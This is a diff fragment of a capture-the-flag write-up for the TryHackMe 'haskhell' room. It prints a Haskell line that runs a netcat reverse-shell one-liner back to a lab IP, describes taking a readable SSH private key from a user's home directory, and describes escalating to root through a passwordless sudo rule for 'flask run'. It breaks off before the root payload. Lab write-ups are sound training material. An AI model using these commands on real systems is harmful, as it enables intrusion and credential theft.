ChrisPritchard/ctf-writeups/tryhackme/haskhell.md

 main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.5.4 4444 >/tmp/f"
 ```

-5. In the /home/prof directory was a .ssh with a readably id_rsa.
-I extracted this to ssh in as prof.
+5. In the `/home/prof` directory was a `.ssh` folder with a readable `id_rsa`.
+I extracted this to my host machine in order to ssh in as prof.
-6. Prof had  `(root) NOPASSWD: /usr/bin/flask run`.
+6. Via `sudo -l`, prof had  `(root) NOPASSWD: /usr/bin/flask run`.
 After a bit of trial and error around how this command worked, I got a root reverse shell via:

     a. creating a file called shell.py with the following contents: